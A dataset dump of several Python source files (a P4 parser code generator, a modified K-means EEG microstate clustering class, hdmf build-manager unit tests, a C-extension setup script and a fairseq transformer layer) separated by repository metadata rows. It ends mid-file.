generated_code += " pd->headers[" + str(hi_prefix) + "].length = hdr_length;// sugar@86\n"
generated_code += " pd->headers[" + str(hi_prefix) + "].var_width_field_bitwidth = hdr_length * 8 - " + str(sum([f[1] if f[1] != p4.P4_AUTO_WIDTH else 0 for f in hi.header_type.layout.items()])) + ";// sugar@87\n"
generated_code += " if(hdr_length > " + str(hi.header_type.max_length) + ") //TODO: is this the correct place for the check// sugar@88\n"
generated_code += " p4_pe_header_too_long(pd);// sugar@89\n"
generated_code += " }// sugar@90\n"
generated_code += " \n"
for state_name, parse_state in hlir.p4_parse_states.items():
generated_code += " static void parse_state_" + str(state_name) + "(packet_descriptor_t* pd, uint8_t* buf, lookup_table_t** tables);// sugar@94\n"
generated_code += "\n"
for state_name, parse_state in hlir.p4_parse_states.items():
branch_on = parse_state.branch_on
if branch_on:
generated_code += " static inline void build_key_" + str(state_name) + "(packet_descriptor_t *pd, uint8_t *buf, uint8_t *key) {// sugar@100\n"
for switch_ref in branch_on:
if type(switch_ref) is p4.p4_field:
field_instance = switch_ref
if is_vwf(field_instance):
addError("generating build_key_" + state_name, "Variable width field '" + str(field_instance) + "' in parser '" + state_name + "' return select statement is not supported")
else:
byte_width = (field_instance.width + 7) / 8
if byte_width <= 4:
generated_code += " EXTRACT_INT32_BITS(pd, " + str(fld_id(field_instance)) + ", *(uint32_t*)key)// sugar@109\n"
generated_code += " key += sizeof(uint32_t);// sugar@110\n"
else:
generated_code += " EXTRACT_BYTEBUF(pd, " + str(fld_id(field_instance)) + ", key)// sugar@112\n"
generated_code += " key += " + str(byte_width) + ";// sugar@113\n"
elif type(switch_ref) is tuple:
generated_code += " uint8_t* ptr;// sugar@115\n"
offset, width = switch_ref
# TODO
addError("generating parse state %s"%state_name, "current() calls are not supported yet")
generated_code += " }// sugar@119\n"
for state_name, parse_state in hlir.p4_parse_states.items():
generated_code += " static void parse_state_" + str(state_name) + "(packet_descriptor_t* pd, uint8_t* buf, lookup_table_t** tables)// sugar@122\n"
generated_code += " {// sugar@123\n"
generated_code += " uint32_t value32;// sugar@124\n"
generated_code += " (void)value32;// sugar@125\n"
for call in parse_state.call_sequence:
if call[0] == p4.parse_call.extract:
hi = call[1]
generated_code += " extract_header_" + str(hi) + "(buf, pd);// sugar@130\n"
generated_code += " buf += pd->headers[" + str(hdr_prefix(hi.name)) + "].length;// sugar@131\n"
for f in hi.fields:
if parsed_field(hlir, f):
if f.width <= 32:
generated_code += " EXTRACT_INT32_AUTO(pd, " + str(fld_id(f)) + ", value32)// sugar@135\n"
generated_code += " pd->fields." + str(fld_id(f)) + " = value32;// sugar@136\n"
generated_code += " pd->fields.attr_" + str(fld_id(f)) + " = 0;// sugar@137\n"
elif call[0] == p4.parse_call.set:
dest_field, src = call[1], call[2]
if type(src) is int or type(src) is long:
hex(src)
# TODO
elif type(src) is p4.p4_field:
src
# TODO
elif type(src) is tuple:
offset, width = src
# TODO
addError("generating parse state %s"%state_name, "set_metadata during parsing is not supported yet")
branch_on = parse_state.branch_on
if not branch_on:
branch_case, next_state = parse_state.branch_to.items()[0]
generated_code += " " + str(format_state(next_state)) + "// sugar@154\n"
else:
key_byte_width = get_key_byte_width(branch_on)
generated_code += " uint8_t key[" + str(key_byte_width) + "];// sugar@157\n"
generated_code += " build_key_" + str(state_name) + "(pd, buf, key);// sugar@158\n"
has_default_case = False
for case_num, case in enumerate(parse_state.branch_to.items()):
branch_case, next_state = case
mask_name = "mask_value_%d" % case_num
value_name = "case_value_%d" % case_num
if branch_case == p4.P4_DEFAULT:
has_default_case = True
generated_code += " " + str(format_state(next_state)) + "// sugar@166\n"
continue
if type(branch_case) is int:
value = branch_case
value_len, l = int_to_big_endian_byte_array(value)
generated_code += " uint8_t " + str(value_name) + "[" + str(value_len) + "] = {// sugar@171\n"
for c in l:
generated_code += " " + str(c) + ",// sugar@173\n"
generated_code += " };// sugar@174\n"
generated_code += " if ( memcmp(key, " + str(value_name) + ", " + str(value_len) + ") == 0)// sugar@175\n"
generated_code += " " + str(format_state(next_state)) + "// sugar@176\n"
elif type(branch_case) is tuple:
value = branch_case[0]
mask = branch_case[1]
# TODO
addError("generating parse state %s"%state_name, "value masking is not supported yet")
elif type(branch_case) is p4.p4_parse_value_set:
value_set = branch_case
# TODO
addError("generating parse state %s"%state_name, "value sets are not supported yet")
continue
if not has_default_case:
generated_code += " return NULL;// sugar@188\n"
generated_code += " }// sugar@189\n"
generated_code += " \n"
generated_code += " void parse_packet(packet_descriptor_t* pd, lookup_table_t** tables) {// sugar@192\n"
generated_code += " parse_state_start(pd, pd->data, tables);// sugar@193\n"
generated_code += " }// sugar@194\n" | 53.402062 | 225 | 0.60222 |
6030598e6a8abed013a11b643c449b8380c1e557 | 13,900 | py | Python | pycrostates/cluster/kmeans.py | mscheltienne/pycrostates | be87adf69c94b2b179064f337acd8a49d01c305d | [
"BSD-3-Clause"
] | 1 | 2021-12-14T09:58:57.000Z | 2021-12-14T09:58:57.000Z | pycrostates/cluster/kmeans.py | mscheltienne/pycrostates | be87adf69c94b2b179064f337acd8a49d01c305d | [
"BSD-3-Clause"
] | null | null | null | pycrostates/cluster/kmeans.py | mscheltienne/pycrostates | be87adf69c94b2b179064f337acd8a49d01c305d | [
"BSD-3-Clause"
] | null | null | null | """Class and functions to use modified Kmeans."""
from pathlib import Path
from typing import Optional, Tuple, Union
import numpy as np
from mne import BaseEpochs
from mne.io import BaseRaw
from mne.parallel import parallel_func
from numpy.random import Generator, RandomState
from numpy.typing import NDArray
from ..utils import _corr_vectors
from ..utils._checks import _check_random_state, _check_type
from ..utils._docs import copy_doc, fill_doc
from ..utils._logs import _set_verbose, logger
from ._base import _BaseCluster
@fill_doc
class ModKMeans(_BaseCluster):
"""
Modified K-Means clustering algorithms.
Parameters
----------
n_clusters : int
The number of clusters to form as well as the number of centroids to
generate.
n_init : int
Number of time the k-means algorithm is run with different centroid
seeds. The final result will be the run with highest global explained
variance.
max_iter : int
Maximum number of iterations of the k-means algorithm for a single run.
tol : float
Relative tolerance with regards estimate residual noise in the cluster
centers of two consecutive iterations to declare convergence.
%(random_state)s
"""
# TODO: docstring for tol doesn't look english
def __init__(
self,
n_clusters: int,
n_init: int = 100,
max_iter: int = 300,
tol: Union[int, float] = 1e-6,
random_state: Optional[Union[int, RandomState, Generator]] = None,
):
super().__init__()
# k-means has a fix number of clusters defined at init
self._n_clusters = _BaseCluster._check_n_clusters(n_clusters)
self._cluster_names = [str(k) for k in range(self.n_clusters)]
# k-means settings
self._n_init = ModKMeans._check_n_init(n_init)
self._max_iter = ModKMeans._check_max_iter(max_iter)
self._tol = ModKMeans._check_tol(tol)
self._random_state = _check_random_state(random_state)
# fit variables
self._GEV_ = None
def _repr_html_(self, caption=None):
from ..html_templates import repr_templates_env
template = repr_templates_env.get_template("ModKMeans.html.jinja")
if self.fitted:
n_samples = self._fitted_data.shape[-1]
ch_types, ch_counts = np.unique(
self.get_channel_types(), return_counts=True
)
ch_repr = [
f"{ch_count} {ch_type.upper()}"
for ch_type, ch_count in zip(ch_types, ch_counts)
]
GEV = int(self._GEV_ * 100)
else:
n_samples = None
ch_repr = None
GEV = None
return template.render(
name=self.__class__.__name__,
n_clusters=self._n_clusters,
n_init=self._n_init,
GEV=GEV,
cluster_names=self._cluster_names,
fitted=self._fitted,
n_samples=n_samples,
ch_repr=ch_repr,
)
@copy_doc(_BaseCluster.__eq__)
def __eq__(self, other):
if isinstance(other, ModKMeans):
if not super().__eq__(other):
return False
attributes = (
"_n_init",
"_max_iter",
"_tol",
# '_random_state',
# TODO: think about comparison and I/O for random states
"_GEV_",
)
for attribute in attributes:
try:
attr1 = self.__getattribute__(attribute)
attr2 = other.__getattribute__(attribute)
except AttributeError:
return False
if attr1 != attr2:
return False
return True
return False
@copy_doc(_BaseCluster.__ne__)
def __ne__(self, other):
return not self.__eq__(other)
@copy_doc(_BaseCluster._check_fit)
def _check_fit(self):
super()._check_fit()
# sanity-check
assert self.GEV_ is not None
@copy_doc(_BaseCluster.fit)
@fill_doc
def fit(
self,
inst: Union[BaseRaw, BaseEpochs],
picks: Union[str, NDArray[int]] = "eeg",
tmin: Optional[Union[int, float]] = None,
tmax: Optional[Union[int, float]] = None,
reject_by_annotation: bool = True,
n_jobs: int = 1,
*,
verbose: Optional[str] = None,
) -> NDArray[float]:
"""
%(verbose)s
"""
_set_verbose(verbose) # TODO: decorator nesting is failing
data = super().fit(
inst, picks, tmin, tmax, reject_by_annotation, n_jobs
)
inits = self._random_state.randint(
low=0, high=100 * self._n_init, size=(self._n_init)
)
if n_jobs == 1:
best_gev, best_maps, best_segmentation = None, None, None
count_converged = 0
for init in inits:
gev, maps, segmentation, converged = ModKMeans._kmeans(
data, self._n_clusters, self._max_iter, init, self._tol
)
if not converged:
continue
if best_gev is None or gev > best_gev:
best_gev, best_maps, best_segmentation = (
gev,
maps,
segmentation,
)
count_converged += 1
else:
parallel, p_fun, _ = parallel_func(
ModKMeans._kmeans, n_jobs, total=self._n_init
)
runs = parallel(
p_fun(data, self._n_clusters, self._max_iter, init, self._tol)
for init in inits
)
try:
best_run = np.nanargmax(
[run[0] if run[3] else np.nan for run in runs]
)
best_gev, best_maps, best_segmentation, _ = runs[best_run]
count_converged = sum(run[3] for run in runs)
except ValueError:
best_gev, best_maps, best_segmentation = None, None, None
count_converged = 0
if best_gev is not None:
logger.info(
"Selecting run with highest GEV = %.2f%% after %i/%i "
"iterations converged.",
best_gev * 100,
count_converged,
self._n_init,
)
else:
logger.error(
"All the K-means run failed to converge. Please adapt the "
"tolerance and the maximum number of iteration."
)
self.fitted = False # reset variables related to fit
return # break early
self._GEV_ = best_gev
self._cluster_centers_ = best_maps
self._labels_ = best_segmentation
self._fitted = True
@copy_doc(_BaseCluster.save)
def save(self, fname: Union[str, Path]):
super().save(fname)
# TODO: to be replaced by a general writer than infers the writer from
# the file extension.
from ..io.fiff import _write_cluster
_write_cluster(
fname,
self._cluster_centers_,
self._info,
"ModKMeans",
self._cluster_names,
self._fitted_data,
self._labels_,
n_init=self._n_init,
max_iter=self._max_iter,
tol=self._tol,
GEV_=self._GEV_,
)
# --------------------------------------------------------------------
@staticmethod
def _kmeans(
data: NDArray[float],
n_clusters: int,
max_iter: int,
random_state: Union[RandomState, Generator],
tol: Union[int, float],
) -> Tuple[float, NDArray[float], NDArray[int], bool]:
"""Run the k-means algorithm."""
gfp_sum_sq = np.sum(data**2)
maps, converged = ModKMeans._compute_maps(
data, n_clusters, max_iter, random_state, tol
)
activation = maps.dot(data)
segmentation = np.argmax(np.abs(activation), axis=0)
map_corr = _corr_vectors(data, maps[segmentation].T)
gev = np.sum((data * map_corr) ** 2) / gfp_sum_sq
return gev, maps, segmentation, converged
@staticmethod
def _compute_maps(
data: NDArray[float],
n_clusters: int,
max_iter: int,
random_state: Union[RandomState, Generator],
tol: Union[int, float],
) -> Tuple[NDArray[float], bool]:
"""
Compute microstates maps.
Based on mne_microstates by Marijn van Vliet <w.m.vanvliet@gmail.com>
https://github.com/wmvanvliet/mne_microstates/blob/master/microstates.py
"""
# TODO: Does this work if the RandomState is a generator?
if not isinstance(random_state, np.random.RandomState):
random_state = np.random.RandomState(random_state)
# ------------------------- handle zeros maps -------------------------
# zero map can be due to non data in the recording, it's unlikely that
# all channels recorded the same value at the same time (=0 due to
# average reference)
# ---------------------------------------------------------------------
data = data[:, np.linalg.norm(data.T, axis=1) != 0]
n_channels, n_samples = data.shape
data_sum_sq = np.sum(data**2)
# Select random time points for our initial topographic maps
init_times = random_state.choice(
n_samples, size=n_clusters, replace=False
)
maps = data[:, init_times].T
# Normalize the maps
maps /= np.linalg.norm(maps, axis=1, keepdims=True)
prev_residual = np.inf
for _ in range(max_iter):
# Assign each sample to the best matching microstate
activation = maps.dot(data)
segmentation = np.argmax(np.abs(activation), axis=0)
# Recompute the topographic maps of the microstates, based on the
# samples that were assigned to each state.
for state in range(n_clusters):
idx = segmentation == state
if np.sum(idx) == 0:
maps[state] = 0
continue
# Find largest eigenvector
maps[state] = data[:, idx].dot(activation[state, idx])
maps[state] /= np.linalg.norm(maps[state])
# Estimate residual noise
act_sum_sq = np.sum(
np.sum(maps[segmentation].T * data, axis=0) ** 2
)
residual = abs(data_sum_sq - act_sum_sq)
residual /= float(n_samples * (n_channels - 1))
# check convergence
if (prev_residual - residual) < (tol * residual):
converged = True
break
prev_residual = residual
else:
converged = False
return maps, converged
# --------------------------------------------------------------------
@property
def n_init(self) -> int: # noqa: D401
"""
Number of k-means algorithms run wih different centroid seeds.
:type: `int`
"""
return self._n_init
@property
def max_iter(self) -> int:
"""
Maximum number of iterations of the k-means algorithm for a single run.
:type: `int`
"""
return self._max_iter
@property
def tol(self) -> Union[int, float]:
"""
Relative tolerance.
:type: `float`
"""
return self._tol
@property
def random_state(self) -> Union[RandomState, Generator]:
"""
Random state.
:type: `~numpy.random.RandomState` | `~numpy.random.Generator`
"""
return self._random_state
@property
def GEV_(self) -> float:
"""
GEV_ fit variable.
:type: `float`
"""
if self._GEV_ is None:
assert not self._fitted # sanity-check
logger.warning("Clustering algorithm has not been fitted.")
return self._GEV_
@_BaseCluster.fitted.setter
@copy_doc(_BaseCluster.fitted.setter)
def fitted(self, fitted):
super(self.__class__, self.__class__).fitted.__set__(self, fitted)
if not fitted:
self._GEV_ = None
# --------------------------------------------------------------------
# ---------------
# For now, check function are defined as static within KMeans. If they are
# used outside KMeans, they should be moved to regular function in _base.py
# ---------------
@staticmethod
def _check_n_init(n_init: int) -> int:
"""Check that n_init is a positive integer."""
_check_type(n_init, ("int",), item_name="n_init")
if n_init <= 0:
raise ValueError(
"The number of initialization must be a positive integer. "
f"Provided: '{n_init}'."
)
return n_init
@staticmethod
def _check_max_iter(max_iter: int) -> int:
"""Check that max_iter is a positive integer."""
_check_type(max_iter, ("int",), item_name="max_iter")
if max_iter <= 0:
raise ValueError(
"The number of max iteration must be a positive integer. "
f"Provided: '{max_iter}'."
)
return max_iter
@staticmethod
def _check_tol(tol: Union[int, float]) -> Union[int, float]:
"""Check that tol is a positive number."""
_check_type(tol, ("numeric",), item_name="tol")
if tol <= 0:
raise ValueError(
"The tolerance must be a positive number. "
f"Provided: '{tol}'."
)
return tol
| 33.174224 | 80 | 0.547482 |
ca5aa7f5713e60b3f34f2982e0b31931e7734451 | 14,415 | py | Python | tests/unit/build_tests/test_io_manager.py | satra/hdmf | fab5660b1e009151980939e266e63a6c408064aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | tests/unit/build_tests/test_io_manager.py | satra/hdmf | fab5660b1e009151980939e266e63a6c408064aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | tests/unit/build_tests/test_io_manager.py | satra/hdmf | fab5660b1e009151980939e266e63a6c408064aa | [
"BSD-3-Clause-LBNL"
] | null | null | null | import re
from hdmf.build import GroupBuilder, DatasetBuilder, ObjectMapper, BuildManager, TypeMap, ContainerConfigurationError
from hdmf.spec import GroupSpec, AttributeSpec, DatasetSpec, SpecCatalog, SpecNamespace, NamespaceCatalog
from hdmf.spec.spec import ZERO_OR_MANY
from hdmf.testing import TestCase
from abc import ABCMeta, abstractmethod
from tests.unit.utils import Foo, FooBucket, CORE_NAMESPACE
class FooMapper(ObjectMapper):
"""Maps nested 'attr2' attribute on dataset 'my_data' to Foo.attr2 in constructor and attribute map
"""
def __init__(self, spec):
super().__init__(spec)
my_data_spec = spec.get_dataset('my_data')
self.map_spec('attr2', my_data_spec.get_attribute('attr2'))
class TestBase(TestCase):
def setUp(self):
self.foo_spec = GroupSpec(
doc='A test group specification with a data type',
data_type_def='Foo',
datasets=[
DatasetSpec(
doc='an example dataset',
dtype='int',
name='my_data',
attributes=[
AttributeSpec(
name='attr2',
doc='an example integer attribute',
dtype='int'
)
]
)
],
attributes=[AttributeSpec('attr1', 'an example string attribute', 'text')]
)
self.spec_catalog = SpecCatalog()
self.spec_catalog.register_spec(self.foo_spec, 'test.yaml')
self.namespace = SpecNamespace(
'a test namespace',
CORE_NAMESPACE,
[{'source': 'test.yaml'}],
version='0.1.0',
catalog=self.spec_catalog)
self.namespace_catalog = NamespaceCatalog()
self.namespace_catalog.add_namespace(CORE_NAMESPACE, self.namespace)
self.type_map = TypeMap(self.namespace_catalog)
self.type_map.register_container_type(CORE_NAMESPACE, 'Foo', Foo)
self.type_map.register_map(Foo, FooMapper)
self.manager = BuildManager(self.type_map)
class TestBuildManager(TestBase):
def test_build(self):
container_inst = Foo('my_foo', list(range(10)), 'value1', 10)
expected = GroupBuilder(
'my_foo',
datasets={
'my_data':
DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': container_inst.object_id})
builder1 = self.manager.build(container_inst)
self.assertDictEqual(builder1, expected)
def test_build_memoization(self):
container_inst = Foo('my_foo', list(range(10)), 'value1', 10)
expected = GroupBuilder(
'my_foo',
datasets={
'my_data': DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': container_inst.object_id})
builder1 = self.manager.build(container_inst)
builder2 = self.manager.build(container_inst)
self.assertDictEqual(builder1, expected)
self.assertIs(builder1, builder2)
def test_construct(self):
builder = GroupBuilder(
'my_foo',
datasets={
'my_data': DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': -1})
container = self.manager.construct(builder)
self.assertListEqual(container.my_data, list(range(10)))
self.assertEqual(container.attr1, 'value1')
self.assertEqual(container.attr2, 10)
def test_construct_memoization(self):
builder = GroupBuilder(
'my_foo', datasets={'my_data': DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': -1})
container1 = self.manager.construct(builder)
container2 = self.manager.construct(builder)
self.assertIs(container1, container2)
class NestedBaseMixin(metaclass=ABCMeta):
def setUp(self):
super().setUp()
self.foo_bucket = FooBucket('test_foo_bucket', [
Foo('my_foo1', list(range(10)), 'value1', 10),
Foo('my_foo2', list(range(10, 20)), 'value2', 20)])
self.foo_builders = {
'my_foo1': GroupBuilder('my_foo1',
datasets={'my_data': DatasetBuilder(
'my_data',
list(range(10)),
attributes={'attr2': 10})},
attributes={'attr1': 'value1', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': self.foo_bucket.foos['my_foo1'].object_id}),
'my_foo2': GroupBuilder('my_foo2', datasets={'my_data':
DatasetBuilder(
'my_data',
list(range(10, 20)),
attributes={'attr2': 20})},
attributes={'attr1': 'value2', 'namespace': CORE_NAMESPACE, 'data_type': 'Foo',
'object_id': self.foo_bucket.foos['my_foo2'].object_id})
}
self.setUpBucketBuilder()
self.setUpBucketSpec()
self.spec_catalog.register_spec(self.bucket_spec, 'test.yaml')
self.type_map.register_container_type(CORE_NAMESPACE, 'FooBucket', FooBucket)
self.type_map.register_map(FooBucket, self.setUpBucketMapper())
self.manager = BuildManager(self.type_map)
@abstractmethod
def setUpBucketBuilder(self):
raise NotImplementedError('Cannot run test unless setUpBucketBuilder is implemented')
@abstractmethod
def setUpBucketSpec(self):
raise NotImplementedError('Cannot run test unless setUpBucketSpec is implemented')
@abstractmethod
def setUpBucketMapper(self):
raise NotImplementedError('Cannot run test unless setUpBucketMapper is implemented')
def test_build(self):
''' Test default mapping for an Container that has an Container as an attribute value '''
builder = self.manager.build(self.foo_bucket)
self.assertDictEqual(builder, self.bucket_builder)
def test_construct(self):
container = self.manager.construct(self.bucket_builder)
self.assertEqual(container, self.foo_bucket)
class TestNestedContainersNoSubgroups(NestedBaseMixin, TestBase):
'''
Test BuildManager.build and BuildManager.construct when the
Container contains other Containers, but does not keep them in
additional subgroups
'''
def setUpBucketBuilder(self):
self.bucket_builder = GroupBuilder(
'test_foo_bucket',
groups=self.foo_builders,
attributes={'namespace': CORE_NAMESPACE, 'data_type': 'FooBucket', 'object_id': self.foo_bucket.object_id})
def setUpBucketSpec(self):
self.bucket_spec = GroupSpec('A test group specification for a data type containing data type',
name="test_foo_bucket",
data_type_def='FooBucket',
groups=[GroupSpec(
'the Foos in this bucket',
data_type_inc='Foo',
quantity=ZERO_OR_MANY)])
def setUpBucketMapper(self):
return ObjectMapper
class TestNestedContainersSubgroup(NestedBaseMixin, TestBase):
'''
Test BuildManager.build and BuildManager.construct when the
Container contains other Containers that are stored in a subgroup
'''
def setUpBucketBuilder(self):
tmp_builder = GroupBuilder('foo_holder', groups=self.foo_builders)
self.bucket_builder = GroupBuilder(
'test_foo_bucket',
groups={'foos': tmp_builder},
attributes={'namespace': CORE_NAMESPACE, 'data_type': 'FooBucket', 'object_id': self.foo_bucket.object_id})
def setUpBucketSpec(self):
tmp_spec = GroupSpec(
'A subgroup for Foos',
name='foo_holder',
groups=[GroupSpec('the Foos in this bucket',
data_type_inc='Foo',
quantity=ZERO_OR_MANY)])
self.bucket_spec = GroupSpec('A test group specification for a data type containing data type',
name="test_foo_bucket",
data_type_def='FooBucket',
groups=[tmp_spec])
def setUpBucketMapper(self):
class BucketMapper(ObjectMapper):
def __init__(self, spec):
super().__init__(spec)
self.unmap(spec.get_group('foo_holder'))
self.map_spec('foos', spec.get_group('foo_holder').get_data_type('Foo'))
return BucketMapper
class TestNestedContainersSubgroupSubgroup(NestedBaseMixin, TestBase):
'''
Test BuildManager.build and BuildManager.construct when the
Container contains other Containers that are stored in a subgroup
in a subgroup
'''
def setUpBucketBuilder(self):
tmp_builder = GroupBuilder('foo_holder', groups=self.foo_builders)
tmp_builder = GroupBuilder('foo_holder_holder', groups={'foo_holder': tmp_builder})
self.bucket_builder = GroupBuilder(
'test_foo_bucket',
groups={'foo_holder': tmp_builder},
attributes={'namespace': CORE_NAMESPACE, 'data_type': 'FooBucket', 'object_id': self.foo_bucket.object_id})
def setUpBucketSpec(self):
tmp_spec = GroupSpec('A subgroup for Foos',
name='foo_holder',
groups=[GroupSpec('the Foos in this bucket',
data_type_inc='Foo',
quantity=ZERO_OR_MANY)])
tmp_spec = GroupSpec('A subgroup to hold the subgroup', name='foo_holder_holder', groups=[tmp_spec])
self.bucket_spec = GroupSpec('A test group specification for a data type containing data type',
name="test_foo_bucket",
data_type_def='FooBucket',
groups=[tmp_spec])
def setUpBucketMapper(self):
class BucketMapper(ObjectMapper):
def __init__(self, spec):
super().__init__(spec)
self.unmap(spec.get_group('foo_holder_holder'))
self.unmap(spec.get_group('foo_holder_holder').get_group('foo_holder'))
self.map_spec('foos', spec.get_group('foo_holder_holder').get_group('foo_holder').get_data_type('Foo'))
return BucketMapper
def test_build(self):
''' Test default mapping for an Container that has an Container as an attribute value '''
builder = self.manager.build(self.foo_bucket)
self.assertDictEqual(builder, self.bucket_builder)
def test_construct(self):
container = self.manager.construct(self.bucket_builder)
self.assertEqual(container, self.foo_bucket)
class TestNoMappedAttribute(TestBase):
def test_build(self):
"""Test that an error is raised when a spec is not mapped to a container attribute."""
class Unmapper(ObjectMapper):
def __init__(self, spec):
super().__init__(spec)
self.unmap(self.spec.get_dataset('my_data')) # remove mapping from this spec to container attribute
self.type_map.register_map(Foo, Unmapper) # override
container_inst = Foo('my_foo', list(range(10)), 'value1', 10)
msg = (r"<class '.*Unmapper'> has no container attribute mapped to spec: %s"
% re.escape(str(self.foo_spec.get_dataset('my_data'))))
with self.assertRaisesRegex(ContainerConfigurationError, msg):
self.manager.build(container_inst)
class TestNoAttribute(TestBase):
def test_build(self):
"""Test that an error is raised when a spec is mapped to a non-existent container attribute."""
class Unmapper(ObjectMapper):
def __init__(self, spec):
super().__init__(spec)
self.map_spec("unknown", self.spec.get_dataset('my_data'))
self.type_map.register_map(Foo, Unmapper) # override
container_inst = Foo('my_foo', list(range(10)), 'value1', 10)
msg = ("Foo 'my_foo' does not have attribute 'unknown' for mapping to spec: %s"
% self.foo_spec.get_dataset('my_data'))
with self.assertRaisesWith(ContainerConfigurationError, msg):
self.manager.build(container_inst)
class TestTypeMap(TestBase):
def test_get_ns_dt_missing(self):
bldr = GroupBuilder('my_foo', attributes={'attr1': 'value1'})
dt = self.type_map.get_builder_dt(bldr)
ns = self.type_map.get_builder_ns(bldr)
self.assertIsNone(dt)
self.assertIsNone(ns)
def test_get_ns_dt(self):
bldr = GroupBuilder('my_foo', attributes={'attr1': 'value1', 'namespace': 'CORE', 'data_type': 'Foo',
'object_id': -1})
dt = self.type_map.get_builder_dt(bldr)
ns = self.type_map.get_builder_ns(bldr)
self.assertEqual(dt, 'Foo')
self.assertEqual(ns, 'CORE')
# TODO:
class TestWildCardNamedSpecs(TestCase):
pass
| 42.272727 | 119 | 0.579188 |
ae010ebfdaddbb3dddd347501f4986f4a32cc01b | 2,439 | py | Python | setup.py | DamonLee5/mbircone | 680cfd9714dce240e2060cce7a15020b1a640d65 | [
"BSD-3-Clause"
] | 1 | 2022-03-15T06:47:20.000Z | 2022-03-15T06:47:20.000Z | setup.py | DamonLee5/mbircone | 680cfd9714dce240e2060cce7a15020b1a640d65 | [
"BSD-3-Clause"
] | 7 | 2021-12-05T21:16:54.000Z | 2022-03-29T20:59:11.000Z | setup.py | DamonLee5/mbircone | 680cfd9714dce240e2060cce7a15020b1a640d65 | [
"BSD-3-Clause"
] | 1 | 2021-12-06T15:14:37.000Z | 2021-12-06T15:14:37.000Z | import os
import sys
import numpy as np
from setuptools import setup, Extension
from Cython.Distutils import build_ext
NAME = "mbircone"
VERSION = "0.1"
DESCRIPTION = "Python Package for Cone Beam reconstruction"
REQUIRES = ['numpy','Cython','psutil','Pillow'] # external package dependencies
LICENSE = "BSD-3-Clause"
AUTHOR = "Soumendu Majee"
# Specifies directory containing cython functions to be compiled
PACKAGE_DIR = "mbircone"
SRC_FILES = [PACKAGE_DIR + '/src/allocate.c', PACKAGE_DIR + '/src/MBIRModularUtilities3D.c',
PACKAGE_DIR + '/src/icd3d.c', PACKAGE_DIR + '/src/recon3DCone.c',
PACKAGE_DIR + '/src/computeSysMatrix.c',
PACKAGE_DIR + '/src/interface.c', PACKAGE_DIR + '/interface_cy_c.pyx']
compiler_str = os.environ.get('CC')
# Set default to gcc in case CC is not set
if not compiler_str:
compiler_str = 'gcc'
# Single threaded clang compile
if compiler_str == 'clang':
c_extension = Extension(PACKAGE_DIR+'.interface_cy_c', SRC_FILES,
libraries=[],
language='c',
include_dirs=[np.get_include()])
# OpenMP gcc compile
if compiler_str =='gcc':
c_extension = Extension(PACKAGE_DIR+'.interface_cy_c', SRC_FILES,
libraries=[],
language='c',
include_dirs=[np.get_include()],
# for gcc-10 "-std=c11" can be added as a flag
extra_compile_args=["-std=c11","-O3", "-fopenmp","-Wno-unknown-pragmas"],
extra_link_args=["-lm","-fopenmp"])
# OpenMP icc compile
if compiler_str =='icc':
if sys.platform == 'linux':
os.environ['LDSHARED'] = 'icc -shared'
c_extension = Extension(PACKAGE_DIR+'.interface_cy_c', SRC_FILES,
libraries=[],
language='c',
include_dirs=[np.get_include()],
extra_compile_args=["-O3","-DICC","-qopenmp","-no-prec-div","-restrict","-ipo","-inline-calloc",
"-qopt-calloc","-no-ansi-alias","-xCORE-AVX2"],
extra_link_args=["-lm","-qopenmp"])
setup(install_requires=REQUIRES,
packages=[PACKAGE_DIR],
zip_safe=False,
name=NAME,
version=VERSION,
description=DESCRIPTION,
author=AUTHOR,
license=LICENSE,
cmdclass={"build_ext": build_ext},
ext_modules=[c_extension]
)
| 32.959459 | 116 | 0.603526 |
f9ada37bde699213446c46c61c7f4636655f7cb4 | 16,857 | py | Python | fairseq/modules/transformer_layer.py | mpsilfve/fairseq | eb228ee74c6bc9803eb7dbd398d8cda16c55ccd2 | [
"MIT"
] | 115 | 2021-08-25T14:58:12.000Z | 2022-03-21T11:25:36.000Z | fairseq/modules/transformer_layer.py | mpsilfve/fairseq | eb228ee74c6bc9803eb7dbd398d8cda16c55ccd2 | [
"MIT"
] | 5 | 2021-09-13T10:48:28.000Z | 2021-12-21T13:52:25.000Z | fairseq/modules/transformer_layer.py | mpsilfve/fairseq | eb228ee74c6bc9803eb7dbd398d8cda16c55ccd2 | [
"MIT"
] | 11 | 2021-08-25T16:22:07.000Z | 2021-11-24T16:26:20.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Dict, List, Optional
import torch
import torch.nn as nn
from fairseq import utils
from fairseq.modules import LayerNorm, MultiheadAttention
from fairseq.modules.fairseq_dropout import FairseqDropout
from fairseq.modules.quant_noise import quant_noise
from torch import Tensor
class TransformerEncoderLayer(nn.Module):
"""Encoder layer block.
In the original paper each operation (multi-head attention or FFN) is
postprocessed with: `dropout -> add residual -> layernorm`. In the
tensor2tensor code they suggest that learning is more robust when
preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.encoder_normalize_before* to ``True``.
Args:
args (argparse.Namespace): parsed command-line arguments
"""
def __init__(self, args):
super().__init__()
self.args = args
self.embed_dim = args.encoder_embed_dim
self.quant_noise = getattr(args, 'quant_noise_pq', 0)
self.quant_noise_block_size = getattr(args, 'quant_noise_pq_block_size', 8) or 8
self.self_attn = self.build_self_attention(self.embed_dim, args)
self.self_attn_layer_norm = LayerNorm(self.embed_dim)
self.dropout_module = FairseqDropout(
args.dropout, module_name=self.__class__.__name__
)
self.activation_fn = utils.get_activation_fn(
activation=getattr(args, 'activation_fn', 'relu') or "relu"
)
activation_dropout_p = getattr(args, "activation_dropout", 0) or 0
if activation_dropout_p == 0:
